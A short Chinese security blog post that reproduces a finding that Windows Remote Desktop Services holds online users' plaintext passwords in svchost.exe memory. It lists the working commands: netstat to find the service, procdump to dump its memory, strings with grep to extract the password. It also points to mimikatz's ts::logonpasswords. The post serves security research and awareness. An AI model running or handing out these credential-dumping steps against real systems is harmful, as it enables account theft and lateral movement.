从svchost.exe转储RDP在线用户的明文密码

admin 2021年10月19日03:04:57评论174 views字数 629阅读2分5秒阅读模式

推特上看到一篇推文 https://twitter.com/jonasLyk/status/1393058962942083076 他发现了在远程桌面服务的内存中存储了用户明文密码,本文复现下。

转储明文

我有一台08的server,账号密码为administrator admin08!@#。使用3389登录

从svchost.exe转储RDP在线用户的明文密码
image.png

运行如下命令转储远程桌面服务的进程内存

netstat -nob | Select-String TermService -Context 1.procdump.exe -accepteula -ma 2812 rdp.dmp

然后用strings过滤字符串发现确实抓到了明文


strings -el rdp.dmp |grep admin08 -C3
从svchost.exe转储RDP在线用户的明文密码
image.png

mimikatz发布了一个Pre-release版本[1],提供了ts::logonpasswords一键抓取,不过在2008上不起作用,等待本杰明继续更新。

从svchost.exe转储RDP在线用户的明文密码
image.png

思考

其他进程中是否还有明文保存?转储远程桌面服务进程的内存是不是不会被杀软拦截了?Windows是不是不安全了?

References

[1] Pre-release版本: https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210518


分享、点赞、看就是对我们的一种支持!

从svchost.exe转储RDP在线用户的明文密码


本文始发于微信公众号(ChaBug):从svchost.exe转储RDP在线用户的明文密码

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月19日03:04:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从svchost.exe转储RDP在线用户的明文密码https://cn-sec.com/archives/387081.html

发表评论

匿名网友 填写信息